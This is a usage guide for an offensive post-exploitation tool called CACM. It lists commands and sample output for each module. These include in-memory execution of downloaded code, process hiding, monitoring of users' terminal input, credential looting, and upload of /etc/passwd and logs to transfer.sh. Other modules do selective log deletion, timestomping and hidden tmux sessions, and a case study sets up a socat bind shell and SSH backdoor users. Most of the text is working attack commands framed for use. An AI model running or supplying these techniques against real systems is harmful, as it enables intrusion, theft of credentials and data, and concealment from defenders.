CACM Tool Usage Guide

📖 Introduction

CACM (Come and catch me) is an advanced penetration testing tool that provides rich functionality modules for information gathering, system discovery, privilege persistence, and other penetration testing activities. This tool is developed in Go language and supports both interactive command-line interface and single command execution mode.

🚀 Quick Start

💻 Usage Methods

Launch Methods

# Interactive mode
./CACM
xhelp # View help interactively

# Single command execution mode
./CACM -c "command_name parameters"

# Display help
./CACM -h

Interactive Interface

After startup, you'll see CACM's ASCII art and welcome message:

 ▗▄▄▖ ▗▄▖  ▗▄▄▖▗▖  ▗▖
▐▌   ▐▌ ▐▌▐▌   ▐▛▚▞▜▌
▐▌   ▐▛▀▜▌▐▌   ▐▌  ▐▌
▝▚▄▄▖▐▌ ▐▌▝▚▄▄▖▐▌  ▐▌ tools

Come and catch me - Advanced Penetration Testing Tool
Version: v1.0 tools
Project: https://github.com/RuoJi6/CACM

🛠️ Core Functionality Modules

1. Information Gathering Module

sub - Subdomain Discovery

Function: Query all subdomains of target domain through crt.sh and ip.thc.org

ATT&CK: T1590.005 (Gather Victim Network Information)

Usage:

# Query single domain
sub example.com

# Query multiple domains
sub example.com test.com

# Display detailed information
sub example.com -v

Example:

CACM> sub baidu.com
[*] Querying crt.sh for baidu.com...
[*] Found 156 subdomains from crt.sh
[*] Querying ip.thc.org for baidu.com...
[*] Found 23 additional subdomains from ip.thc.org
[+] Total unique subdomains: 179

www.baidu.com
map.baidu.com
tieba.baidu.com
zhidao.baidu.com
...

ws - System Information Discovery

Function: Comprehensive system information gathering including system configuration, network info, domain names, etc.

ATT&CK: T1082 (System Information Discovery)

Usage:

# Basic information gathering
ws

# Verbose mode
ws -v

# Skip network information
ws --no-network

# Output to file
ws -o system_info.txt

scan - Port Scanning

Function: Advanced port scanner with service detection, inspired by fscan

ATT&CK: T1046 (Network Service Scanning)

Usage:

# Scan single host
scan 192.168.1.1

# Scan network segment
scan 192.168.1.0/24

# Specify ports
scan 192.168.1.1 -p 22,80,443,3389

# Specify thread count
scan 192.168.1.0/24 -t 100

# Service detection
scan 192.168.1.1 -s

Example:

CACM> scan 192.168.1.1 -p 1-1000 -t 50
[*] Starting fscan-style port scan...
[*] Targets: 1 | Ports: 1000 | Threads: 50
[+] 192.168.1.1:22    SSH-2.0-OpenSSH_8.0
[+] 192.168.1.1:80    HTTP/1.1 200 OK
[+] 192.168.1.1:443   HTTPS/1.1 200 OK
[*] Scan completed in 2.3 seconds

2. System Management Module

common - Common Command Collection

Function: Provides common system management commands, inspired by hackshell

ATT&CK: T1083 (File and Directory Discovery)

Subcommands:

lt: List files sorted by time
ltr: Recursively list files sorted by time
lss: List files sorted by size
lssr: Recursively list files sorted by size
psg: Search processes
lsg: Search files

Usage:

# List current directory files by time
common lt

# Recursively list /var/log by time
common ltr /var/log

# List /tmp files by size
common lss /tmp

# Search SSH processes
common psg ssh

# Search log files
common lsg '\.log$'

xpty - Terminal User Discovery

Function: Display all terminals and logged-in user information

ATT&CK: T1033 (System Owner/User Discovery)

Usage:

# Display all terminals
xpty

# Verbose mode
xpty -v

# Show only active sessions
xpty --active

3. Tool Download Module

bin - Static Binary Downloader

Function: Download static compiled versions of various penetration testing tools

ATT&CK: T1105 (Ingress Tool Transfer)

Usage:

# Download single tool
bin nmap

# Download multiple tools
bin nmap curl jq

# List all available tools
bin list

# Search tools
bin search nmap

# View download history
bin info

Available Tool Categories:

Network Tools: nmap, ncat, curl, wget, socat, ping, tcpdump
File Tools: fd, find, grep, awk, sed, ripgrep
System Tools: ps, netstat, ss, lsof, busybox, strace
Data Tools: jq, base64, hexdump, xxd
Security Tools: naabu, fscan, searchall, dddd, gogo

Example:

CACM> bin nmap
[*] Downloading nmap for linux/amd64...
[*] URL: https://bin.pkgforge.dev/x86_64/nmap
[+] Downloaded to: /tmp/nmap (12.3 MB)
[+] Made executable
[*] nmap is ready to use!

4. Memory Execution Module

memexec - Execute Binary in Memory

Function: Execute binary files in memory without writing to disk

ATT&CK: T1055 (Process Injection)

Usage:

# Execute from stdin
cat /usr/bin/id | memexec

# Download from URL and execute
memexec https://example.com/tool

# Execute local file
memexec /usr/bin/nmap -sS target.com

# Execute system command
memexec id -u

Example:

CACM> echo "#!/bin/bash\necho 'Hello from memory!'" | memexec
[*] Executing binary from stdin...
[+] Binary loaded into memory (45 bytes)
[+] Execution successful
Hello from memory!

5. Process Management Module

hide - Process Hiding

Function: Hide specified processes from common discovery tools

ATT&CK: T1055 (Process Injection)

Usage:

# Hide process by PID
hide 1234

# List hideable processes
hide list

# Show hiding status
hide status

# Restore hidden process
hide restore 1234

tit - User Input Monitoring

Function: Monitor and record user input in terminals

ATT&CK: T1056 (Input Capture)

Usage:

# List monitorable processes
tit list

# Monitor bash/zsh input
tit read 1234

# Monitor SSH session output
tit write 1234

# Debug mode
tit read 1234 --debug

Example:

CACM> tit list
[*] Scanning for monitorable processes...
[+] Found 3 bash processes:
  PID: 1234 - /bin/bash (user: alice)
  PID: 5678 - /bin/zsh (user: bob)
  PID: 9012 - /bin/bash (user: root)

CACM> tit read 1234
[*] Monitoring PID 1234 (/bin/bash)...
[+] Started input monitoring
[2024-01-15 10:30:15] ls -la
[2024-01-15 10:30:20] cat /etc/passwd
[2024-01-15 10:30:25] sudo su -

6. File Operations Module

enc/dec - File Encryption/Decryption

Function: Encrypt and decrypt files using AES-256-GCM

ATT&CK: T1027 (Obfuscated Files or Information)

Usage:

# Encrypt file
enc secret.txt

# Decrypt file
dec secret.txt.enc

# Specify password
enc secret.txt -p mypassword

# Batch encryption
enc *.txt

# Use environment variable
HS_TOKEN=mysecret enc file.txt

shred - Secure File Deletion

Function: Securely delete files to prevent data recovery

ATT&CK: T1070.004 (File Deletion)

Usage:

# Securely delete single file
shred sensitive.txt

# Delete multiple files
shred *.log

# Specify overwrite count
shred -n 7 secret.txt

# Delete and remove file
shred -u temp.txt

7. Network Tools Module

dns - DNS Query Tool

Function: Perform various DNS query operations

ATT&CK: T1590.005 (Gather Victim Network Information)

Usage:

# Basic DNS query
dns example.com

# Specify record type
dns example.com A
dns example.com MX
dns example.com TXT

# Reverse DNS query
dns -r 8.8.8.8

# Use specific DNS server
dns example.com -s 8.8.8.8

Example:

CACM> dns baidu.com
[*] Resolving baidu.com...
[+] A Record: 110.242.68.66
[+] A Record: 39.156.66.10

CACM> dns baidu.com MX
[*] Querying MX records for baidu.com...
[+] MX: 10 mx.maillb.baidu.com
[+] MX: 15 mx1.baidu.com
[+] MX: 20 mx50.baidu.com

rdns - Batch Reverse DNS Query

Function: Perform batch reverse DNS queries on IP address ranges using multiple public databases

ATT&CK: T1590.005 (Gather Victim Network Information)

Usage:

# Query single IP
rdns 8.8.8.8

# Query IP range
rdns 192.168.1.1-192.168.1.100

# Query network segment
rdns 192.168.1.0/24

# Specify thread count
rdns 192.168.1.0/24 -t 50

# Verbose mode
rdns 8.8.8.8 -v

# Output to file
rdns 192.168.1.0/24 -o rdns_results.txt

Example:

CACM> rdns 8.8.8.8
[*] Reverse DNS lookup for 8.8.8.8...
[*] Querying multiple databases...
[+] PTR: dns.google
[+] Additional info from Shodan: Google Public DNS
[+] ASN: AS15169 (Google LLC)

CACM> rdns 192.168.1.0/24 -t 20
[*] Scanning 254 IPs with 20 threads...
[+] 192.168.1.1: router.local
[+] 192.168.1.10: server01.company.local
[+] 192.168.1.15: workstation-alice.company.local
[*] Completed: 254/254 IPs scanned

dl - Multi-Protocol Download Tool

Function: Download files using multiple methods including curl/wget/python/perl/openssl or native Go HTTP client

ATT&CK: T1071.001 (Web Protocols)

Usage:

# Basic download
dl https://example.com/file.txt

# Specify output file
dl https://example.com/file.txt -o downloaded_file.txt

# Use specific method
dl https://example.com/file.txt -m curl
dl https://example.com/file.txt -m wget
dl https://example.com/file.txt -m python
dl https://example.com/file.txt -m perl
dl https://example.com/file.txt -m openssl
dl https://example.com/file.txt -m native

# Add request headers
dl https://api.example.com/data -H "Authorization: Bearer token123"

# POST request
dl https://api.example.com/submit -X POST -d "data=value"

# Set User-Agent
dl https://example.com/file.txt -A "Mozilla/5.0 Custom Agent"

# Follow redirects
dl https://short.url/redirect -L

# Silent mode
dl https://example.com/file.txt -s

Example:

CACM> dl https://github.com/user/repo/releases/download/v1.0/tool.tar.gz
[*] Downloading using native Go HTTP client...
[*] URL: https://github.com/user/repo/releases/download/v1.0/tool.tar.gz
[*] Size: 15.2 MB
[+] Downloaded to: tool.tar.gz
[*] Download completed successfully

CACM> dl https://api.github.com/repos/user/repo -H "Accept: application/vnd.github.v3+json"
[*] Using curl method...
[+] Response saved to: api_response.json

xbounce - TCP Traffic Forwarding

Function: Forward TCP traffic to destination host, implementing TCP proxy functionality

ATT&CK: T1090.001 (Internal Proxy)

Usage:

# Basic port forwarding
xbounce :8080 target.com:80

# Specify listening address
xbounce 0.0.0.0:8080 192.168.1.100:22

# Local port forwarding
xbounce 127.0.0.1:9999 internal.server:3306

# Show connection statistics
xbounce :8080 target.com:80 -v

# Run in background
xbounce :8080 target.com:80 -d

Example:

CACM> xbounce :8080 internal.server:80
[*] Starting TCP proxy...
[*] Listening on: 0.0.0.0:8080
[*] Forwarding to: internal.server:80
[+] Proxy started successfully
[*] Waiting for connections...
[+] New connection: 192.168.1.50:45678 -> internal.server:80
[*] Data transferred: 1.2KB upstream, 5.4KB downstream

xghostip - Ghost IP Network Operations

Function: Use non-existing IP addresses for network operations to enhance stealth

ATT&CK: T1090.003 (Multi-hop Proxy)

Usage:

# Use ghost IP to send requests
xghostip 10.0.0.1 target.com

# Specify source port
xghostip 192.168.255.254 target.com -p 12345

# Send specific packets
xghostip 172.16.0.1 target.com:80 -d "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n"

# Scan mode
xghostip 10.10.10.10 192.168.1.0/24 -scan

# Verbose mode
xghostip 192.168.0.1 target.com -v

Example:

CACM> xghostip 10.255.255.255 target.com:80
[*] Using ghost IP: 10.255.255.255
[*] Target: target.com:80
[*] Crafting packets with spoofed source...
[+] Packets sent successfully
[*] Response handling via raw sockets

8. System Persistence Module

xsu - User Switching and Command Execution

Function: Switch user identity and execute commands

ATT&CK: T1134.001 (Access Token Manipulation)

Usage:

# Switch to root user
xsu root

# Switch to specified user
xsu alice

# Execute single command
xsu root "id"

# Execute multiple commands
xsu alice "whoami; pwd; ls -la"

# Interactive shell
xsu root -i

# Preserve environment variables
xsu alice -e "echo $HOME"

Example:

CACM> xsu root "cat /etc/shadow | head -5"
[*] Switching to user: root
[*] Executing command: cat /etc/shadow | head -5
[+] Command executed successfully
root:$6$xyz...:18500:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::

xhome - Hidden Temporary Working Directory

Function: Create and manage hidden temporary working directories

ATT&CK: T1564.001 (Hidden Files and Directories)

Usage:

# Create hidden working directory
xhome

# Specify directory location
xhome /tmp/.workspace

# Show current working directory
xhome show

# Change to working directory
xhome cd

# Clean working directory
xhome clean

# Set permissions
xhome /opt/.tools -m 700

Example:

CACM> xhome
[*] Creating hidden temporary HOME directory...
[+] Created: /tmp/.cacm_home_a8f3d2
[+] Set permissions: 700
[+] Environment updated: HOME=/tmp/.cacm_home_a8f3d2
[*] Hidden directory ready for use

CACM> xhome show
[*] Current CACM home: /tmp/.cacm_home_a8f3d2
[*] Directory contents:
  .bashrc
  .profile
  tools/

xtmux - Hidden tmux Sessions

Function: Create hidden tmux sessions that won't show in 'tmux list-sessions'

ATT&CK: T1564.001 (Hidden Files and Directories)

Usage:

# Create hidden session
xtmux new

# Create named hidden session
xtmux new -s hidden_session

# Attach to hidden session
xtmux attach

# Attach to specific hidden session
xtmux attach -s hidden_session

# List hidden sessions
xtmux list

# Kill hidden session
xtmux kill -s hidden_session

# Execute command in hidden session
xtmux send -s hidden_session "ls -la"

Example:

CACM> xtmux new -s persistence
[*] Creating hidden tmux session: persistence
[+] Session created with hidden socket
[*] Session will not appear in 'tmux list-sessions'
[+] Connected to hidden session: persistence

# In another terminal
$ tmux list-sessions
# (persistence session won't be shown)

CACM> xtmux list
[*] Hidden tmux sessions:
  persistence (1 window, created 2024-01-15 10:30)
  backup_shell (2 windows, created 2024-01-15 09:15)

xssh - Stealth SSH Connection

Function: Silently log in to remote host with stealth features

ATT&CK: T1021.004 (SSH)

Usage:

# Basic SSH connection
xssh [email protected]

# Specify port
xssh [email protected] -p 2222

# Use key file
xssh [email protected] -i /path/to/key

# Stealth mode (no logging)
xssh [email protected] --stealth

# Execute single command
xssh [email protected] "uname -a"

# Port forwarding
xssh [email protected] -L 8080:localhost:80

# Dynamic port forwarding (SOCKS proxy)
xssh [email protected] -D 1080

# Run in background
xssh [email protected] -f -N -L 8080:localhost:80

Example:

CACM> xssh [email protected] --stealth
[*] Establishing stealth SSH connection...
[*] Target: [email protected]:22
[*] Disabling host key checking...
[*] Suppressing connection logs...
[+] Connected successfully
[*] Session established with stealth features

admin@target:~$ whoami
admin
admin@target:~$ w
 10:30:15 up 5 days,  2:15,  0 users,  load average: 0.00, 0.01, 0.05
# (current connection won't show in w command output)

xscp - Stealth File Transfer

Function: Silently transfer files using SCP with stealth features

ATT&CK: T1021.004 (SSH)

Usage:

# Upload file
xscp local_file.txt [email protected]:/tmp/

# Download file
xscp [email protected]:/etc/passwd ./

# Recursive directory transfer
xscp -r /local/dir [email protected]:/remote/dir

# Specify port
xscp -P 2222 file.txt [email protected]:/tmp/

# Use key
xscp -i /path/to/key file.txt [email protected]:/tmp/

# Stealth mode
xscp --stealth file.txt [email protected]:/tmp/

# Compressed transfer
xscp -C large_file.tar [email protected]:/tmp/

# Preserve file attributes
xscp -p file.txt [email protected]:/tmp/

Example:

CACM> xscp --stealth /etc/passwd [email protected]:/tmp/.backup
[*] Starting stealth SCP transfer...
[*] Source: /etc/passwd
[*] Destination: [email protected]:/tmp/.backup
[*] Suppressing transfer logs...
[+] Transfer completed: 2.1KB in 0.3s
[*] No traces left in system logs

9. Utility Tools Module

wfind - Writable Directory Discovery

Function: Find writable directories in the system for privilege escalation and file storage

ATT&CK: T1083 (File and Directory Discovery)

Usage:

# Find all writable directories
wfind

# Find writable directories in specific paths
wfind /var /tmp /opt

# Find directories writable by current user only
wfind --user-only

# Find world-writable directories
wfind --world-writable

# Verbose mode (show permissions)
wfind -v

# Exclude common directories
wfind --exclude-common

# Output to file
wfind -o writable_dirs.txt

Example:

CACM> wfind
[*] Scanning for writable directories...
[*] Checking common locations...
[+] /tmp (drwxrwxrwt)
[+] /var/tmp (drwxrwxrwt)
[+] /dev/shm (drwxrwxrwt)
[+] /home/alice (drwxr-xr-x)
[+] /var/log/apache2 (drwxr-xr-x)
[*] Found 5 writable directories

CACM> wfind --world-writable -v
[*] Scanning for world-writable directories...
[+] /tmp
    Permissions: drwxrwxrwt (1777)
    Owner: root:root
    Sticky bit: Yes
[+] /var/tmp
    Permissions: drwxrwxrwt (1777)
    Owner: root:root
    Sticky bit: Yes

hgrep - Human-friendly Text Search

Function: Enhanced grep functionality with formatted output and Chinese support

ATT&CK: T1083 (File and Directory Discovery)

Usage:

# Basic search
hgrep "password" /etc/

# Search for password-related information
hgrep password

# Regular expression search
hgrep -E "^admin:" /etc/passwd

# Case-insensitive search
hgrep -i "error" /var/log/

# Recursive search
hgrep -r "secret" /home/

# Search Chinese content
hgrep "密码" /var/log/

# Show line numbers
hgrep -n "config" /etc/

# Show context lines
hgrep -C 3 "error" /var/log/syslog

# Show only filenames
hgrep -l "password" /etc/*

# Exclude binary files
hgrep -I "secret" /usr/bin/

Example:

CACM> hgrep password
[*] Searching for 'password' patterns...
[*] Scanning common locations...

📁 /etc/mysql/my.cnf
   Line 15: password = secret123
   Context: Database configuration file

📁 /home/alice/.bashrc
   Line 42: export DB_PASSWORD=admin123
   Context: Environment variable

📁 /var/log/auth.log
   Line 1205: Failed password for alice from 192.168.1.100
   Context: Authentication log

[+] Found 3 matches in 3 files

find_subdomains - Subdomain File Search

Function: Search for subdomain information in files

ATT&CK: T1083 (File and Directory Discovery)

Usage:

# Search for subdomains of specified domain
find_subdomains example.com

# Search in specific directories
find_subdomains example.com /var/log /etc

# Search multiple domains
find_subdomains example.com test.com

# Verbose mode
find_subdomains example.com -v

# Output to file
find_subdomains example.com -o subdomains.txt

# Include wildcard domains
find_subdomains example.com --include-wildcards

Example:

CACM> find_subdomains company.com
[*] Searching for subdomains of company.com...
[*] Scanning configuration files...

📁 /etc/nginx/sites-available/default
   Line 25: server_name api.company.com;
   Line 30: server_name admin.company.com;

📁 /var/log/apache2/access.log
   Line 1523: "GET / HTTP/1.1" 200 - "mail.company.com"
   Line 2041: "POST /login HTTP/1.1" 302 - "vpn.company.com"

📁 /etc/hosts
   Line 15: 192.168.1.100 internal.company.com

[+] Found 5 unique subdomains:
  api.company.com
  admin.company.com
  mail.company.com
  vpn.company.com
  internal.company.com

transfer - File Upload Service

Function: Upload files or directories to file sharing services

ATT&CK: T1041 (Exfiltration Over C2 Channel)

Usage:

# Upload single file
transfer file.txt

# Upload directory
transfer /path/to/directory

# Specify service
transfer file.txt --service bashupload
transfer file.txt --service transfer.sh
transfer file.txt --service oshi.at

# Set expiration time
transfer file.txt --expire 7d

# Encrypted upload
transfer sensitive.txt --encrypt

# Batch upload
transfer *.log

# Compress before upload
transfer /large/directory --compress

Example:

CACM> transfer /etc/passwd
[*] Uploading /etc/passwd...
[*] Using service: transfer.sh
[*] File size: 2.1KB
[+] Upload successful!
[*] Download URL: https://transfer.sh/abc123/passwd
[*] URL expires in: 14 days
[*] Direct download: curl https://transfer.sh/abc123/passwd

CACM> transfer /var/log --compress
[*] Compressing directory: /var/log
[*] Archive size: 15.2MB
[*] Uploading compressed archive...
[+] Upload successful!
[*] Download URL: https://bashupload.com/xyz789/logs.tar.gz

10. Security Detection and Evasion Module

edr - EDR/AV Detection

Function: Detect EDR and antivirus software products in the system

ATT&CK: T1518.001 (Security Software Discovery)

Usage:

# Detect all security products
edr

# Verbose mode
edr -v

# Detect specific types
edr --type av
edr --type edr
edr --type firewall

# Output to file
edr -o security_products.txt

# Silent mode
edr --quiet

Example:

CACM> edr
[*] Scanning for EDR/AV security products...
[*] Checking running processes...
[*] Checking installed software...
[*] Checking system services...

🛡️  Detected Security Products:
[+] CrowdStrike Falcon (EDR)
    Process: falconctl
    Service: CSFalconService
    Status: Running

[+] Windows Defender (AV)
    Process: MsMpEng.exe
    Service: WinDefend
    Status: Running

[+] Symantec Endpoint Protection (AV/EDR)
    Process: ccSvcHst.exe
    Service: SepMasterService
    Status: Running

⚠️  Recommendations:
- High detection risk environment
- Consider stealth techniques
- Avoid suspicious process names

lpe - Privilege Escalation Detection

Function: Run linPEAS/winPEAS for privilege escalation detection

ATT&CK: T1068 (Exploitation for Privilege Escalation)

Usage:

# Run privilege escalation detection
lpe

# Specify detection type
lpe --linux
lpe --windows

# Verbose output
lpe -v

# Fast scan
lpe --fast

# Output to file
lpe -o privesc_report.txt

# Check specific categories only
lpe --check sudo
lpe --check suid
lpe --check capabilities

Example:

CACM> lpe
[*] Starting privilege escalation enumeration...
[*] Downloading linPEAS...
[*] Running comprehensive checks...

🔍 System Information:
[+] OS: Ubuntu 20.04.3 LTS
[+] Kernel: 5.4.0-91-generic
[+] Architecture: x86_64

⚠️  Potential Privilege Escalation Vectors:

🔴 SUID Binaries:
[+] /usr/bin/sudo (CVE-2021-3156 - Baron Samedit)
[+] /usr/bin/pkexec (CVE-2021-4034 - PwnKit)

🟡 Writable Files:
[+] /etc/passwd (world-writable!)
[+] /var/log/auth.log (group-writable)

🟢 Sudo Permissions:
[+] alice ALL=(root) NOPASSWD: /usr/bin/systemctl

💡 Recommendations:
1. Exploit sudo vulnerability (CVE-2021-3156)
2. Check systemctl sudo permissions
3. Investigate writable /etc/passwd

loot - Credentials and Secrets Collection

Function: Display common secrets and credentials information

ATT&CK: T1552.001 (Credentials In Files)

Usage:

# Collect all credentials
loot

# Specify types
loot --passwords
loot --keys
loot --tokens
loot --certificates

# Search specific paths
loot --path /home /opt

# Verbose mode
loot -v

# Output to file
loot -o credentials.txt

# Include history files
loot --include-history

Example:

CACM> loot
[*] Collecting credentials and secrets...
[*] Scanning common locations...

🔑 SSH Keys:
[+] /home/alice/.ssh/id_rsa (2048-bit RSA)
[+] /home/bob/.ssh/id_ed25519 (Ed25519)
[+] /root/.ssh/authorized_keys (3 keys)

🔐 Password Files:
[+] /etc/shadow (readable!)
[+] /var/backups/passwd.bak
[+] /home/alice/.mysql_history (contains passwords)

🎫 Tokens & API Keys:
[+] /home/alice/.aws/credentials
[+] /opt/app/.env (DATABASE_PASSWORD=secret123)
[+] /var/log/app.log (JWT tokens in logs)

📜 Certificates:
[+] /etc/ssl/private/server.key
[+] /home/alice/.cert/client.p12

💾 Browser Data:
[+] /home/alice/.mozilla/firefox/profiles/cookies.sqlite
[+] /home/bob/.config/google-chrome/Default/Login Data

⚠️  High-Value Targets Found: 12

11. Timestamp Manipulation Module

notime - Timestamp Disguised Execution

Function: Execute commands at specified file's modification time (requires root)

ATT&CK: T1070.006 (Timestomp)

Usage:

# Execute command using file timestamp
notime /etc/passwd "touch /tmp/hidden_file"

# Verbose mode
notime /var/log/syslog "echo 'stealth' > /tmp/log" -v

# Specify timestamp type
notime /etc/hosts "ls -la" --mtime
notime /etc/hosts "ls -la" --atime
notime /etc/hosts "ls -la" --ctime

Example:

CACM> notime /etc/passwd "touch /tmp/backdoor"
[*] Target file: /etc/passwd
[*] File mtime: 2024-01-10 08:30:15
[*] Command: touch /tmp/backdoor
[*] Setting system time to: 2024-01-10 08:30:15
[+] Command executed at target timestamp
[*] Restoring system time...
[+] Timestamp manipulation completed

# Check result
$ ls -la /tmp/backdoor
-rw-r--r-- 1 root root 0 Jan 10 08:30 /tmp/backdoor

ctime - Modify File Creation Time

Function: Set file's ctime to mtime (requires root)

ATT&CK: T1070.006 (Timestomp)

Usage:

# Modify single file
ctime /tmp/suspicious_file

# Batch modify
ctime /tmp/*.log

# Recursively modify directory
ctime -r /var/log/

# Verbose mode
ctime -v /tmp/file

# Backup original timestamps
ctime --backup /tmp/file

Example:

CACM> ctime /tmp/malware.exe
[*] Processing: /tmp/malware.exe
[*] Original ctime: 2024-01-15 10:30:00
[*] Target mtime: 2024-01-10 08:15:30
[+] ctime updated successfully
[*] File now appears created at: 2024-01-10 08:15:30

notime_cp - Timestamp Preserving Copy

Function: Copy files while preserving all timestamps (birth-time, ctime, mtime, atime)

ATT&CK: T1070.006 (Timestomp)

Usage:

# Basic copy
notime_cp source.txt destination.txt

# Copy directory
notime_cp -r /source/dir /dest/dir

# Verbose mode
notime_cp -v source.txt dest.txt

# Preserve all attributes
notime_cp -a source.txt dest.txt

# Force overwrite
notime_cp -f source.txt existing_dest.txt

Example:

CACM> notime_cp /etc/passwd /tmp/passwd_backup
[*] Copying with timestamp preservation...
[*] Source: /etc/passwd
[*] Destination: /tmp/passwd_backup
[*] Preserving: birth-time, ctime, mtime, atime
[+] Copy completed with full timestamp preservation

# Verify timestamps
$ stat /etc/passwd /tmp/passwd_backup
  File: /etc/passwd
  Birth: 2024-01-01 00:00:00.000000000
  Modify: 2024-01-10 08:30:15.123456789
  Change: 2024-01-10 08:30:15.123456789
  Access: 2024-01-15 10:25:30.987654321

  File: /tmp/passwd_backup
  Birth: 2024-01-01 00:00:00.000000000  # Identical
  Modify: 2024-01-10 08:30:15.123456789  # Identical
  Change: 2024-01-10 08:30:15.123456789  # Identical
  Access: 2024-01-15 10:25:30.987654321  # Identical

12. Log Cleaning Module

xlog - Log Cleaning Tool

Function: Remove lines containing specified patterns from files or clear systemd journal

ATT&CK: T1070.003 (Clear Command History)

Usage:

# Remove lines containing specific pattern from file
xlog /var/log/auth.log "192.168.1.100"

# Clean multiple log files
xlog /var/log/*.log "suspicious_activity"

# Clear systemd journal
xlog --systemd

# Clear specific service logs
xlog --systemd --service ssh

# Clear logs from specific time range
xlog --systemd --since "2024-01-15 10:00:00"

# Backup before cleaning
xlog --backup /var/log/auth.log "failed_login"

# Regular expression pattern
xlog -E /var/log/access.log "192\.168\.1\.(100|101|102)"

# Verbose mode
xlog -v /var/log/syslog "error"

Example:

CACM> xlog /var/log/auth.log "192.168.1.100"
[*] Processing: /var/log/auth.log
[*] Pattern: 192.168.1.100
[*] Scanning file for matching lines...
[+] Found 15 matching lines
[*] Creating backup: /var/log/auth.log.backup.20240115
[*] Removing matching lines...
[+] Removed 15 lines containing '192.168.1.100'
[*] File cleaned successfully

CACM> xlog --systemd --service ssh
[*] Clearing systemd journal for service: ssh
[*] Journal size before: 45.2MB
[+] SSH service logs cleared
[*] Journal size after: 42.1MB
[*] Cleared 3.1MB of SSH logs

13. Advanced Scanning Module

np - Advanced Secret Scanner

Function: Advanced secret scanner with Chinese support

ATT&CK: T1552.001 (Credentials In Files)

Usage:

# Basic scan
np /path/to/scan

# Scan specific file types
np --type config /etc/

# Chinese support scan
np --chinese /var/log/

# Deep scan
np --deep /home/

# Formatted output (recommended with less -R)
np /etc/ | less -R

# Scan specific patterns
np --pattern password /var/

# Exclude specific directories
np --exclude /proc,/sys /

# Output to file
np /home/ -o secrets_report.txt

Example:

CACM> np /etc/ | less -R
[*] Advanced secret scanner with Chinese support
[*] Scanning: /etc/
[*] Patterns: passwords, keys, tokens, Chinese secrets

🔍 Configuration Files:
📁 /etc/mysql/my.cnf
   🔑 Line 15: password = secret123
   🔑 Line 23: root_password = admin456

📁 /etc/nginx/nginx.conf
   🎫 Line 45: ssl_certificate_key /etc/ssl/private/server.key

🔍 Chinese Content:
📁 /etc/app/config.ini
   🔐 Line 8: 数据库密码 = mysecret123
   🔐 Line 12: API密钥 = abc123def456

🔍 Environment Files:
📁 /etc/environment
   🎫 Line 3: AWS_SECRET_ACCESS_KEY=xyz789abc123

[+] Total secrets found: 6
[+] High-risk items: 3

🎯 Real-World Case Studies

Case 1: Complete Internal Network Penetration

# 1. Initial information gathering
CACM> ws -v -o system_info.txt
[*] Collecting comprehensive system information...
[+] OS: Ubuntu 20.04.3 LTS
[+] Kernel: 5.4.0-91-generic
[+] CPU: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (4 cores)
[+] Memory: 8GB total, 2.1GB available
[+] Network interfaces: eth0 (192.168.1.50), docker0 (172.17.0.1)
[+] Domain: company.local

# 2. Security product detection
CACM> edr
[*] Scanning for security products...
[+] No EDR detected
[+] Basic firewall: ufw (inactive)
[⚠] Low security environment detected

# 3. Network discovery and port scanning
CACM> scan 192.168.1.0/24 -p 22,80,443,3389,445,3306 -t 100 -s
[*] Starting comprehensive network scan...
[+] 192.168.1.10:22   SSH-2.0-OpenSSH_7.4 (Ubuntu)
[+] 192.168.1.15:80   Apache/2.4.41 (Ubuntu)
[+] 192.168.1.15:3306 MySQL 8.0.25
[+] 192.168.1.20:443  nginx/1.18.0
[+] 192.168.1.25:3389 Microsoft Terminal Services
[+] 192.168.1.30:445  Samba 4.11.6

# 4. Domain information gathering
CACM> sub company.com
[*] Querying multiple sources...
[+] Found 67 subdomains:
mail.company.com (192.168.1.15)
vpn.company.com (203.0.113.10)
admin.company.com (192.168.1.20)
api.company.com (192.168.1.25)
db.company.com (192.168.1.15)

# 5. DNS information gathering
CACM> dns company.com MX
[+] MX: 10 mail.company.com
CACM> rdns 192.168.1.0/24 -t 20
[+] 192.168.1.10: server01.company.local
[+] 192.168.1.15: web-db.company.local
[+] 192.168.1.20: admin-panel.company.local

# 6. Find writable directories
CACM> wfind
[+] /tmp (drwxrwxrwt)
[+] /var/tmp (drwxrwxrwt)
[+] /dev/shm (drwxrwxrwt)
[+] /var/www/html/uploads (drwxrwxrwx) ⚠️

Case 2: Privilege Escalation and Persistence

# 1. Privilege escalation detection
CACM> lpe
[*] Running privilege escalation enumeration...
[🔴] CRITICAL: /usr/bin/sudo vulnerable to CVE-2021-3156
[🟡] SUID binary: /usr/bin/pkexec (potential CVE-2021-4034)
[🟢] Sudo permissions: alice ALL=(root) NOPASSWD: /usr/bin/systemctl

# 2. Download penetration tools
CACM> bin nmap socat nc pspy
[*] Downloading static binaries...
[+] nmap: 12.3MB downloaded to /tmp/nmap
[+] socat: 2.1MB downloaded to /tmp/socat
[+] nc: 1.5MB downloaded to /tmp/nc
[+] pspy: 3.2MB downloaded to /tmp/pspy

# 3. Create hidden working environment
CACM> xhome /dev/shm/.workspace
[+] Created hidden workspace: /dev/shm/.workspace
[+] Set permissions: 700
[+] Environment configured

# 4. Establish stealth backdoor
CACM> xtmux new -s persistence
[*] Created hidden tmux session: persistence
[+] Session will not appear in 'tmux list-sessions'

# Run backdoor in hidden session
CACM> xtmux send -s persistence "/tmp/socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash"

# 5. Hide critical processes
CACM> hide list
[*] Found processes to hide:
  PID: 15234 - socat TCP-LISTEN:4444
CACM> hide 15234
[+] Process 15234 hidden from ps, top, htop

# 6. Monitor administrator activity
CACM> tit list
[*] Found admin sessions:
  PID: 9999 - /bin/bash (user: root)
  PID: 8888 - /bin/bash (user: admin)
CACM> tit read 9999
[*] Monitoring root session...
[2024-01-15 14:30:00] systemctl status ssh
[2024-01-15 14:30:15] tail -f /var/log/auth.log
[2024-01-15 14:30:30] mysql -u root -p

ssh_backdoor - SSH Backdoor User Management

Function: Create and manage SSH backdoor users for persistence

ATT&CK: T1136.001 (Create Account: Local Account)

Usage:

# Create SSH backdoor user
ssh_backdoor add backup_user

# List all backdoor users
ssh_backdoor list

# Remove backdoor user
ssh_backdoor remove backup_user

# Hide user (from who, w commands)
ssh_backdoor hide backup_user

# Test SSH connection
ssh_backdoor test backup_user

# Configure SSH service
ssh_backdoor config

